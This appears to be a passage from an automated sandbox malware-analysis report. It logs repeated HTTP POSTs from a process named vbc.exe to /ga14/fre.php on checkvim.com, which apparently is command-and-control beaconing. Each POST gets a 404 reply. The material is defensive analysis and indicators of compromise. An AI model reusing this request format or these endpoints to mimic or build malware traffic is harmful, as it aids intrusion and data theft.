                    Sep 28, 2021 06:50:41.324284077 CEST | 237 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:52 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    14 | 192.168.2.22 | 49179 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:41.640229940 CEST | 238 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:42.012145042 CEST | 239 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:53 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    140192.168.2.22493055.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    141 | 192.168.2.22 | 49306 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    142 | 192.168.2.22 | 49307 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    15 | 192.168.2.22 | 49180 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:42.299756050 CEST | 239 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:42.665060043 CEST | 240 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:54 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    16 | 192.168.2.22 | 49181 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:42.959615946 CEST | 241 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:43.342381954 CEST | 241 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:54 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    17 | 192.168.2.22 | 49182 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:43.668917894 CEST | 242 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:44.033987999 CEST | 243 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:55 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    18 | 192.168.2.22 | 49183 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:44.317406893 CEST | 243 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:44.690879107 CEST | 244 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:56 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    19 | 192.168.2.22 | 49184 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:44.980669022 CEST | 245 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:45.327651024 CEST | 245 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:56 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    2 | 192.168.2.22 | 49167 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:30.225629091 CEST | 221 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 176
                    Connection: close
                    Sep 28, 2021 06:50:30.580647945 CEST | 222 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:41 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 15
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    20 | 192.168.2.22 | 49185 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:45.606333017 CEST | 246 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:45.970263958 CEST | 247 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:57 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    21 | 192.168.2.22 | 49186 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:46.257925987 CEST | 248 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:46.621850967 CEST | 248 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:57 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    22 | 192.168.2.22 | 49187 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:46.934037924 CEST | 249 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:47.284598112 CEST | 250 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:58 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    23 | 192.168.2.22 | 49188 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:47.567337990 CEST | 250 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:47.929215908 CEST | 251 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:59 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    24 | 192.168.2.22 | 49189 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:48.217751026 CEST | 252 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:48.600373983 CEST | 252 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:59 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    25 | 192.168.2.22 | 49190 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:48.901348114 CEST | 253 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:49.275072098 CEST | 254 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:00 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    26 | 192.168.2.22 | 49191 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:49.543982983 CEST | 255 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:49.910859108 CEST | 255 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:01 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    27 | 192.168.2.22 | 49192 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:50.201147079 CEST | 256 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:50.559416056 CEST | 257 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:01 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    28 | 192.168.2.22 | 49193 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:50.837245941 CEST | 257 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:51.200424910 CEST | 258 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:02 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    29 | 192.168.2.22 | 49194 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:51.664554119 CEST | 259 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:52.034302950 CEST | 259 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:03 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    3 | 192.168.2.22 | 49168 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:30.788969040 CEST | 223 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:31.149317026 CEST | 223 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:42 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    30 | 192.168.2.22 | 49195 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:52.442626953 CEST | 260 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:52.784749985 CEST | 261 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:04 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    31 | 192.168.2.22 | 49196 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:53.378968954 CEST | 261 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:53.741503000 CEST | 262 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:05 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    32 | 192.168.2.22 | 49197 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:54.025804996 CEST | 263 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:54.384705067 CEST | 263 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:05 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    33 | 192.168.2.22 | 49198 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:54.678868055 CEST | 264 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:55.031650066 CEST | 265 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:06 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    34 | 192.168.2.22 | 49199 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:55.313486099 CEST | 266 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:55.687469006 CEST | 266 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:07 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    35 | 192.168.2.22 | 49200 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:55.987133980 CEST | 267 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:56.347594023 CEST | 268 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:07 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    36 | 192.168.2.22 | 49201 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:56.626189947 CEST | 268 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:56.996386051 CEST | 269 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:08 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    37 | 192.168.2.22 | 49202 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:57.284758091 CEST | 270 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:57.618108034 CEST | 270 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:08 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    38 | 192.168.2.22 | 49203 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:57.890671015 CEST | 271 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:58.297914982 CEST | 272 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:09 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    39 | 192.168.2.22 | 49204 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:58.583041906 CEST | 273 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:58.927284956 CEST | 273 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:10 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
